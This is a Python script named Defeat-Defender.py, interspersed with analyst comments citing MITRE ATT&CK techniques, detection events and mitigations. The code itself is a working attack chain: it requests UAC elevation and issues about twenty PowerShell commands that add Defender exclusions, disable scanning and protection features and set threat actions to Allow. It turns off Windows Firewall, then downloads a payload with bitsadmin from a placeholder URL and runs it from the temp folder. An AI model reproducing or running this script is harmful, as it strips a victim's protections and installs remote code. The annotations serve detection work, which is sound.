Defeat-Defender.py
from pathlib import Path
import platform
import tempfile
import subprocess
import time
import os
import sys
import win32com.shell.shell as shell
# Self-elevation step. Unless the last command-line argument is the 'asadmin'
# marker, the script relaunches itself through ShellExecuteEx with the 'runas'
# verb (the standard UAC elevation request), appends the marker so the elevated
# copy skips this branch, and exits the unelevated copy.
# Analyst note: nothing below takes effect unless that elevation request is
# approved. The relaunch shows up in process-creation telemetry as the Python
# interpreter started with this script's path and a trailing 'asadmin' argument.
ASADMIN = 'asadmin'
if sys.argv[-1] != ASADMIN:
script = os.path.abspath(sys.argv[0])
params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
sys.exit(0)
# Defense-impairment block (MITRE ATT&CK T1562.001 for the Defender settings,
# T1562.004 for the firewall line). Each call spawns powershell.exe to change one
# Microsoft Defender preference; the value meanings below follow Microsoft's
# Set-MpPreference / Add-MpPreference documentation.
# Detection: Defender logs preference changes as event 5007 in the
# Microsoft-Windows-Windows Defender/Operational log, and a burst of
# powershell.exe children carrying Add-MpPreference/Set-MpPreference on the
# command line is a high-signal pattern in process-creation and script-block logs.
# Mitigation: Tamper Protection and centrally managed Defender policy are the
# controls intended to stop local changes like these from taking effect; least
# privilege removes the admin rights the cmdlets need.

# Exclude every .exe and .tmp file from Defender scanning.
subprocess.call("powershell.exe -command Add-MpPreference -ExclusionExtension .exe", shell=TRUE)
subprocess.call("powershell.exe -command Add-MpPreference -ExclusionExtension .tmp", shell=TRUE)
# Turn off Controlled Folder Access (the ransomware folder-protection feature).
subprocess.call("powershell.exe -command Set-MpPreference -EnableControlledFolderAccess Disabled", shell=TRUE)
# Turn off potentially-unwanted-application blocking.
subprocess.call("powershell.exe -command Set-MpPreference -PUAProtection disable", shell=TRUE)
# Repeat of the .exe exclusion issued at the top of this block.
subprocess.call("powershell.exe -command Add-MpPreference -ExclusionExtension .exe", shell=TRUE)
# Turn off cloud "block at first sight" and the scanning of downloaded files/attachments.
subprocess.call("powershell.exe -command Set-MpPreference -DisableBlockAtFirstSeen $true", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -DisableIOAVProtection $true", shell=TRUE)
# Disable privacy mode (the setting that restricts threat-history display to administrators).
subprocess.call("powershell.exe -command Set-MpPreference -DisablePrivacyMode $true", shell=TRUE)
# Suppress the definition update on startup when no antimalware engine is present.
subprocess.call("powershell.exe -command Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true", shell=TRUE)
# Turn off archive scanning, network exploit protection and script scanning.
subprocess.call("powershell.exe -command Set-MpPreference -DisableArchiveScanning $true", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -DisableIntrusionPreventionSystem $true", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -DisableScriptScanning $true", shell=TRUE)
# Cut cloud telemetry: SubmitSamplesConsent 2 = never send samples, MAPSReporting 0 = disabled.
subprocess.call("powershell.exe -command Set-MpPreference -SubmitSamplesConsent 2", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -MAPSReporting 0", shell=TRUE)
# Set the default remediation for every threat severity to 6 (Allow), so detections are not acted on.
subprocess.call("powershell.exe -command Set-MpPreference -HighThreatDefaultAction 6 -Force", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -ModerateThreatDefaultAction 6", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -LowThreatDefaultAction 6", shell=TRUE)
subprocess.call("powershell.exe -command Set-MpPreference -SevereThreatDefaultAction 6", shell=TRUE)
# ScanScheduleDay 8 = never run the scheduled scan.
subprocess.call("powershell.exe -command Set-MpPreference -ScanScheduleDay 8", shell=TRUE)
# Turn Windows Firewall off for all profiles (domain, private, public).
subprocess.call("powershell.exe -command netsh advfirewall set allprofiles state off", shell=TRUE)
# Fixed 25-second pause after the preference changes, before the download starts.
time.sleep(25)
# Payload retrieval (MITRE ATT&CK T1197 BITS Jobs / T1105 Ingress Tool Transfer):
# bitsadmin downloads an executable from a placeholder URL into %temp%\payload.exe,
# a path and extension already covered by the .exe exclusion requested earlier.
# Detection: bitsadmin.exe run with /transfer and a remote URL appears in
# process-creation logs, and the BITS job is recorded in the
# Microsoft-Windows-Bits-Client/Operational log. Blocking or alerting on
# bitsadmin.exe use by non-administrative tooling is a common hardening step.
subprocess.call(
"bitsadmin /transfer mydownloadjob /download /priority FOREGROUND https://direct-url-of-payload/payload.exe %temp%\payload.exe", shell=TRUE) #change this url
# Switch the working directory to the temp directory so the later relative
# "payload.exe" reference resolves there.
tempdir = Path(tempfile.gettempdir())
os.chdir(tempdir)
# Execution stage: runbackdoor() launches "payload.exe" through os.system, using
# a relative name resolved against the current working directory, and the script
# exits once that call returns.
# Detection: an executable started from the user temp directory by a Python
# process, shortly after Defender preference changes and a BITS transfer, is the
# end of the chain to correlate on. Application control (e.g. rules that deny
# execution from temp paths) stops this step even where the exclusions were applied.
def runbackdoor():
os.system("payload.exe") #change this
runbackdoor()
sys.exit()